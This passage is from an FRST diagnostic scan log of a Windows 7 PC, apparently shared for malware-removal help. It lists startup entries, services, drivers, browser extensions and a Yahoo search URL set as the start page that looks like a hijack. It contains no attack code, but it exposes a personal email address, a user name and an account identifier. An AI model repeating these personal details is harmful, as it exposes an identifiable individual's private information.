                (Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
                (Siber Systems) C:\Program Files\Siber Systems\AI RoboForm\robotaskbaricon.exe
                (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
                (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
                (Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil32_25_0_0_148_ActiveX.exe
                (Farbar) C:\Users\hilton\Downloads\FRST (2).exe

                ==================== Registry (Whitelisted) ====================

                (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

                HKLM...\Run: [atchk] => C:\Program Files\Intel\AMT\atchk.exe [401408 2009-12-01] (Intel Corporation)
                HKLM...\Run: [SoundMAXPnP] => C:\Program Files\Analog Devices\Core\smax4pnp.exe [1314816 2010-06-15] (Analog Devices, Inc.)
                HKLM...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-04-12] (AVAST Software)
                HKLM...\Run: [Fences] => C:\Program Files\Stardock\Fences\Fences.exe [3934168 2016-09-16] (Stardock Corporation)
                HKLM...\Run: [CanonQuickMenu] => C:\Program Files\Canon\Quick Menu\CNQMMAIN.EXE [1314432 2016-06-09] (CANON INC.)
                HKLM...\Run: [Windows Mobile Device Center] => C:\Windows\WindowsMobile\wmdc.exe [648072 2007-05-31] (Microsoft Corporation)
                HKLM...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files\Intel\Bluetooth\btmshellex.dll",TrayApp
                HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [7348440 2017-03-03] (Piriform Ltd)
                HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Run: [Amazon Music] => C:\Users\hilton\AppData\Local\Amazon Music\Amazon Music Helper.exe [3694056 2017-01-31] (Amazon Services LLC)
                HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Run: [Fences] => C:\Program Files\Stardock\Fences\Fences.exe [3934168 2016-09-16] (Stardock Corporation)
                HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Run: [eM Client] => C:\Program Files\eM Client\MailClient.exe [24742760 2016-10-21] (eM Client s.r.o.)
                HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Run: [DellSystemDetect] => C:\Users\hilton\AppData\Local\Apps\2.0\3VGPG9W0.MPE\2E0VXQW4.WA5\dell..tion_6d0a76327dca4869_0007.000b_df227eeaae3cac0d\DellSystemDetect.exe [310728 2017-02-07] (Dell)
                HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Run: [RoboForm] => C:\Program Files\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe [110376 2017-04-12] (Siber Systems)
                Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
                ShellIconOverlayIdentifiers: [00asw] → {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2017-04-12] (AVAST Software)
                Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2017-02-27]
                ShortcutTarget: Bluetooth.lnk → C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
                GroupPolicy: Restriction ? <======= ATTENTION
                CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

                ==================== Internet (Whitelisted) ====================

                (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

                Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62
                Tcpip..\Interfaces{7F3D0977-3F81-48D1-8A0D-5B6CF1496778}: [NameServer] 77.234.40.79
                Tcpip..\Interfaces{B78AF187-32FB-4F20-86D2-C40DA41B6832}: [DhcpNameServer] 209.18.47.61 209.18.47.62
                Internet Explorer:
                HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_mdaffmarmarie_16_28_rps11 5078_rps&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus% 26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtC0EyE0F0F tC0BtC0FyEyEyEtCtBtN0D0Tzu0StCyCyDyBtN1L2XzutAtFtB tBtFtAtFtCtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StByCzy yEtCyEtAtAtGyCtA0EtDtG0Dzz0C0CtGyEyB0FtAtGzy0AyDyD tD0AtD0Azy0D0BtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StB0Bzy0C 0FtC0CzytG0D0EtB0AtGyE0EyE0BtGzzyCtBzytG0F0D0CyDyE zyzy0EtCyEtAyE2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtBtCtD %26cr%3D861529325%26a%3Dwbf_mdaffmarmarie_16_28%26 os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional
                SearchScopes: HKLM → DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_mdaffmarmarie_16_28_rps11 5078_rps&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus% 26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtC0EyE0F0F tC0BtC0FyEyEyEtCtBtN0D0Tzu0StCyCyDyBtN1L2XzutAtFtB tBtFtAtFtCtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StByCzy yEtCyEtAtAtGyCtA0EtDtG0Dzz0C0CtGyEyB0FtAtGzy0AyDyD tD0AtD0Azy0D0BtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StB0Bzy0C 0FtC0CzytG0D0EtB0AtGyE0EyE0BtGzzyCtBzytG0F0D0CyDyE zyzy0EtCyEtAyE2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtBtCtD %26cr%3D861529325%26a%3Dwbf_mdaffmarmarie_16_28%26 os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={ searchTerms}
                SearchScopes: HKLM → {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_mdaffmarmarie_16_28_rps11 5078_rps&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus% 26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtC0EyE0F0F tC0BtC0FyEyEyEtCtBtN0D0Tzu0StCyCyDyBtN1L2XzutAtFtB tBtFtAtFtCtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StByCzy yEtCyEtAtAtGyCtA0EtDtG0Dzz0C0CtGyEyB0FtAtGzy0AyDyD tD0AtD0Azy0D0BtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StB0Bzy0C 0FtC0CzytG0D0EtB0AtGyE0EyE0BtGzzyCtBzytG0F0D0CyDyE zyzy0EtCyEtAyE2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtBtCtD %26cr%3D861529325%26a%3Dwbf_mdaffmarmarie_16_28%26 os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={ searchTerms}
                BHO: RoboForm Toolbar Helper → {724d43a9-0d85-11d4-9908-00400523e39a} → C:\Program Files\Siber Systems\AI RoboForm\roboform.dll [2017-04-12] (Siber Systems Inc.)
                BHO: avast! Online Security → {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} → C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-04-12] (AVAST Software)
                Toolbar: HKLM - &RoboForm Toolbar - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files\Siber Systems\AI RoboForm\roboform.dll [2017-04-12] (Siber Systems Inc.)
                Toolbar: HKU\S-1-5-21-3292114827-816517840-1514174382-1000 → &RoboForm Toolbar - {724D43A0-0D85-11D4-9908-00400523E39A} - C:\Program Files\Siber Systems\AI RoboForm\roboform.dll [2017-04-12] (Siber Systems Inc.)
                DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} hxxps://files.pcpitstop.com/cab/pcmatic.cab
                Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - No File
                StartMenuInternet: IEXPLORE.EXE - iexplore.exe
                FireFox:
                FF DefaultProfile: hiltonheflin@yahoo.com
                FF ProfilePath: C:\Users\hilton\AppData\Roaming\Mozilla\Firefox\Profiles\pc153f57.default-1485114558992 [2017-04-13]
                FF Extension: (Adblock Plus) - C:\Users\hilton\AppData\Roaming\Mozilla\Firefox\Profiles\pc153f57.default-1485114558992\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-02-03]
                FF Extension: (Disable Prefetch) - C:\Users\hilton\AppData\Roaming\Mozilla\Firefox\Profiles\pc153f57.default-1485114558992\features\{24ba2855-20b3-4585-bcde-f033a53eda89}\disable-prefetch@mozilla.org.xpi [2017-04-06]
                FF HKLM...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF48
                FF Extension: (Avast SafePrice) - C:\Program Files\AVAST Software\Avast\SafePrice\FF48 [2017-04-12]
                FF HKLM...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF48
                FF Extension: (Avast Online Security) - C:\Program Files\AVAST Software\Avast\WebRep\FF48 [2017-04-12]
                FF HKLM...\Firefox\Extensions: [{22119944-ED35-4ab1-910B-E619EA06A115}] - C:\Program Files\Siber Systems\AI RoboForm\Firefox\roboform.xpi
                FF Extension: (RoboForm Toolbar) - C:\Program Files\Siber Systems\AI RoboForm\Firefox\roboform.xpi [2017-04-12]
                FF HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Firefox\Extensions: [{22119944-ED35-4ab1-910B-E619EA06A115}] - C:\Program Files\Siber Systems\AI RoboForm\Firefox\roboform.xpi
                FF Plugin: @Microsoft.com/NpCtrl,version=1.0 → c:\Program Files\Microsoft Silverlight\5.1.50906.0\npctrl.dll [2017-03-09] ( Microsoft Corporation)
                FF Plugin: @tools.google.com/Google Update;version=3 → C:\Program Files\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)
                FF Plugin: @tools.google.com/Google Update;version=9 → C:\Program Files\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)
                FF Plugin: Adobe Reader → C:\Program Files\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-04] (Adobe Systems Inc.)
                Chrome:
                CHR Profile: C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default [2017-04-12]
                CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-04-12]
                CHR Extension: (Docs) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-04-12]
                CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-12-25]
                CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-12-25]
                CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\bmnlcjabgnpnenekpadlanbbkooimhnj [2017-04-12]
                CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-04-12]
                CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2017-04-12]
                CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-04-12]
                CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-04-12]
                CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2017-04-12]
                CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2017-04-12]
                CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-04-12]
                CHR Extension: (Gmail) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-04-03]
                CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-12]
                CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\pnlccmojcmeohlpggmfnbbiapkmbliob [2017-04-12]
                CHR HKLM...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
                CHR HKLM...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
                CHR HKLM...\Chrome\Extension: [okmhneofinpilciglijihehjpaegledb] - <no Path/update_url>
                CHR HKLM...\Chrome\Extension: [pnlccmojcmeohlpggmfnbbiapkmbliob] - C:\Program Files\Siber Systems\AI RoboForm\Chrome\rf-chrome.crx [2016-08-12]

                ==================== Services (Whitelisted) ====================

                (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

                R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [5758120 2017-04-12] (AVAST Software s.r.o.)
                R2 atchksrv; C:\Program Files\Intel\AMT\atchksrv.exe [176128 2009-12-01] (Intel Corporation) [File not signed]
                R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [261712 2017-04-12] (AVAST Software)
                R2 avast! Firewall; C:\Program Files\AVAST Software\Avast\afwServ.exe [310496 2017-04-12] (AVAST Software)
                R2 Bluetooth Device Monitor; C:\Program Files\Intel\Bluetooth\devmonsrv.exe [1202216 2016-07-18] (Motorola Solutions, Inc.)
                R2 Bluetooth Media Service; C:\Program Files\Intel\Bluetooth\mediasrv.exe [1722408 2016-07-18] (Motorola Solutions, Inc.)
                R2 Bluetooth OBEX Service; C:\Program Files\Intel\Bluetooth\obexsrv.exe [1161256 2016-07-18] (Motorola Solutions, Inc.)
                R2 iBtSiva; C:\Program Files\Intel\Bluetooth\ibtsiva.exe [151280 2016-07-23] (Intel Corporation)
                R2 Intel(R) PROSet Monitoring Service; C:\Windows\system32\IProsetMonitor.exe [180992 2014-10-16] (Intel Corporation)
                R2 LMS; C:\Program Files\Intel\AMT\LMS.exe [102400 2009-12-01] (Intel) [File not signed]
                R3 SlimWareServices; C:\Program Files\SlimWare Utilities\Services\SlimWare.Services.exe [68952 2016-08-01] (SlimWare Utilities Holdings, Inc.)
                S3 ss_conn_service; C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
                R2 UNS; C:\Program Files\Intel\AMT\UNS.exe [2519040 2009-12-01] (Intel) [File not signed]
                S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation)

                ===================== Drivers (Whitelisted) ======================

                (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

                R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdriverx.sys [255184 2017-04-12] (AVAST Software s.r.o.)
                R0 aswbidsh; C:\Windows\system32\drivers\aswbidshx.sys [148208 2017-04-12] (AVAST Software s.r.o.)
                R0 aswblog; C:\Windows\system32\drivers\aswblogx.sys [267528 2017-04-12] (AVAST Software s.r.o.)
                R0 aswbuniv; C:\Windows\system32\drivers\aswbunivx.sys [41176 2017-04-12] (AVAST Software s.r.o.)
                S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [34136 2017-04-12] (AVAST Software)
                R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [31064 2017-04-12] (AVAST Software)
                R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [106904 2017-04-12] (AVAST Software)
                R3 aswNetNd6; C:\Windows\System32\DRIVERS\aswNetNd6.sys [27896 2017-03-12] (AVAST Software)
                R1 aswNetSec; C:\Windows\system32\drivers\aswNetSec.sys [388488 2017-04-12] (AVAST Software)
                R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [90336 2017-04-12] (AVAST Software)
                R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [62152 2017-04-12] (AVAST Software)
                R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [764064 2017-04-12] (AVAST Software)
                R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [472760 2017-04-12] (AVAST Software)
                R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [118800 2017-04-12] (AVAST Software)
                S3 aswTap; C:\Windows\System32\DRIVERS\aswTap.sys [38984 2016-12-18] (The OpenVPN Project)
                R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [279800 2017-04-12] (AVAST Software)
                S3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [168232 2012-03-31] (Broadcom Corporation.)
                S3 btmaudio; C:\Windows\System32\drivers\btmaud.sys [72168 2015-10-13] (Motorola Solutions, Inc.)
                S3 btmaux; C:\Windows\System32\DRIVERS\btmaux.sys [116200 2015-10-13] (Motorola Solutions, Inc.)
                S3 btwampfl; C:\Windows\System32\DRIVERS\btwampfl.sys [504360 2012-03-31] (Broadcom Corporation.)
                S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [107648 2016-07-22] (Samsung Electronics Co., Ltd.)
                R3 e1express; C:\Windows\System32\DRIVERS\e1e6232.sys [232312 2012-10-30] (Intel Corporation)
                R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [26792 2015-05-29] (Synaptics Incorporated)
                S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [146048 2016-07-22] (Samsung Electronics Co., Ltd.)
                S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [11232 2016-09-21] ()
                S3 mfeplk; system32\drivers\mfeplk.sys

                ==================== NetSvcs (Whitelisted) ===================

                (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

                ==================== One Month Created files and folders ========

                (If an entry is included in the fixlist, the file/folder will be moved.)

                2017-04-13 12:33 - 2017-04-13 12:33 - 01766912 _____ (Farbar) C:\Users\hilton\Downloads\FRST (4).exe
                2017-04-13 12:15 - 2017-04-13 12:15 - 00001146 _____ C:\Users\hilton\Desktop\Addition - Shortcut.lnk
                2017-04-13 12:15 - 2017-04-13 12:15 - 00001106 _____ C:\Users\hilton\Desktop\FRST - Shortcut.lnk
                2017-04-13 12:07 - 2017-04-13 12:07 - 00001124 _____ C:\Users\hilton\Desktop\FRST (3) - Shortcut.lnk
                2017-04-13 12:06 - 2017-04-13 12:06 - 01766912 _____ (Farbar) C:\Users\hilton\Downloads\FRST (3).exe
                2017-04-13 12:00 - 2017-04-13 12:00 - 00001124 _____ C:\Users\hilton\Downloads\FRST (2) - Shortcut.lnk
                2017-04-13 11:59 - 2017-04-13 11:59 - 01766912 _____ (Farbar) C:\Users\hilton\Downloads\FRST (2).exe
                2017-04-13 11:45 - 2017-04-13 11:45 - 00001124 _____ C:\Users\hilton\Downloads\FRST (1) - Shortcut.lnk
                2017-04-13 11:44 - 2017-04-13 11:44 - 01766912 _____ (Farbar) C:\Users\hilton\Downloads\FRST (1).exe
                2017-04-13 11:42 - 2017-04-13 12:09 - 00063931 _____ C:\Users\hilton\Downloads\Shortcut.txt
                2017-04-13 11:41 - 2017-04-13 12:09 - 00023142 _____ C:\Users\hilton\Downloads\Addition.txt
                2017-04-13 11:40 - 2017-04-13 12:34 - 00018726 _____ C:\Users\hilton\Downloads\FRST.txt
                2017-04-13 11:38 - 2017-04-13 11:38 - 01766912 _____ (Farbar) C:\Users\hilton\Downloads\FRST.exe
                2017-04-12 16:04 - 2017-04-12 16:04 - 00000000 ____D C:\ProgramData\SWCUTemp
                2017-04-12 15:18 - 2017-04-12 15:18 - 00000000 ____D C:\Users\TEMP\AppData\Roaming\AVAST Software
                2017-04-12 15:18 - 2017-04-12 15:18 - 00000000 ____D C:\ProgramData\PC Drivers HeadQuarters
                2017-04-12 15:17 - 2017-04-12 15:19 - 00000000 ____D C:\Users\TEMP
                2017-04-12 14:42 - 2017-03-27 13:28 - 00346320 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
                2017-04-12 14:42 - 2017-03-25 15:39 - 20284416 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
                2017-04-12 14:42 - 2017-03-25 15:07 - 04604416 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
                2017-04-12 14:42 - 2017-03-25 15:06 - 13654016 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
                2017-04-12 14:42 - 2017-03-25 14:55 - 02767360 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
                2017-04-12 14:42 - 2017-03-25 14:52 - 02289152 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
                2017-04-12 14:42 - 2017-03-25 14:51 - 01313280 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
                2017-04-12 14:42 - 2017-03-25 14:48 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
                2017-04-12 14:42 - 2017-03-25 14:47 - 02055680 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
                2017-04-12 14:42 - 2017-03-25 14:47 - 00710144 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
                2017-04-12 14:42 - 2017-03-25 14:47 - 00103936 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
                2017-04-12 14:42 - 2017-03-25 14:47 - 00047616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
                2017-04-12 14:42 - 2017-03-25 14:47 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
                2017-04-12 14:42 - 2017-03-25 14:46 - 00693248 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
                2017-04-12 14:42 - 2017-03-25 14:46 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
                2017-04-12 14:42 - 2017-03-25 14:46 - 00620032 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
                2017-04-12 14:42 - 2017-03-25 14:46 - 00230400 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
                2017-04-12 14:42 - 2017-03-25 14:46 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
                2017-04-12 14:42 - 2017-03-25 14:46 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
                2017-04-12 14:42 - 2017-03-25 14:46 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
                2017-04-12 14:42 - 2017-03-25 14:46 - 00047104 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
                2017-04-12 14:42 - 2017-03-25 14:45 - 00689664 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
                2017-04-12 14:42 - 2017-03-25 14:45 - 00416256 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
                2017-04-12 14:42 - 2017-03-25 14:45 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
                2017-04-12 14:42 - 2017-03-25 14:45 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
                2017-04-12 14:42 - 2017-03-25 14:45 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
                2017-04-12 14:42 - 2017-03-25 14:45 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
                2017-04-12 14:42 - 2017-03-25 14:45 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
                2017-04-12 14:42 - 2017-03-25 14:45 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
                2017-04-12 14:42 - 2017-03-25 14:44 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
                2017-04-12 14:42 - 2017-03-25 14:44 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
                2017-04-12 14:42 - 2017-03-25 13:19 - 00341504 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
                2017-04-12 14:42 - 2017-03-25 13:06 - 00476160 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
                2017-04-12 14:42 - 2017-03-25 12:57 - 00667648 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
                2017-04-12 14:42 - 2017-03-25 12:27 - 01155072 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
                2017-04-12 14:42 - 2017-03-24 18:41 - 00306688 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
                2017-04-12 14:42 - 2017-03-22 11:24 - 02953216 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
                2017-04-12 14:42 - 2017-03-22 11:24 - 00174080 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
                2017-04-12 14:42 - 2017-03-22 11:20 - 00073728 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
                2017-04-12 14:42 - 2017-03-22 11:06 - 02091520 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
                2017-04-12 14:42 - 2017-03-22 11:05 - 00573440 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
                2017-04-12 14:42 - 2017-03-22 11:05 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
                2017-04-12 14:42 - 2017-03-22 11:05 - 00093696 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
                2017-04-12 14:42 - 2017-03-22 11:05 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
                2017-04-12 14:42 - 2017-03-22 11:05 - 00035328 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
                2017-04-12 14:42 - 2017-03-22 11:05 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
                2017-04-12 14:42 - 2017-03-22 11:05 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
                2017-04-12 14:42 - 2017-03-14 11:23 - 00730344 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
                2017-04-12 14:42 - 2017-03-14 11:23 - 00218856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
                2017-04-12 14:42 - 2017-03-14 11:17 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
                2017-04-12 14:42 - 2017-03-10 12:27 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
                2017-04-12 14:42 - 2017-03-10 12:19 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
                2017-04-12 14:42 - 2017-03-10 12:19 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
                2017-04-12 14:42 - 2017-03-10 12:19 - 00010240 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
                2017-04-12 14:42 - 2017-03-10 11:54 - 02400256 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
                2017-04-12 14:42 - 2017-03-10 11:53 - 00034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
                2017-04-12 14:42 - 2017-03-08 16:10 - 00805376 _____ (Microsoft Corporation) C:\Windows\system32\cdosys.dll
                2017-04-12 14:42 - 2017-03-08 00:26 - 04000488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
                2017-04-12 14:42 - 2017-03-08 00:26 - 03945192 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
                2017-04-12 14:42 - 2017-03-08 00:26 - 00137960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
                2017-04-12 14:42 - 2017-03-08 00:26 - 00067304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
                2017-04-12 14:42 - 2017-03-08 00:24 - 01310528 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 01416192 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 01062912 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00872448 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00655360 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00553472 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00400896 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
                2017-04-12 14:42 - 2017-03-08 00:22 - 00294400 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
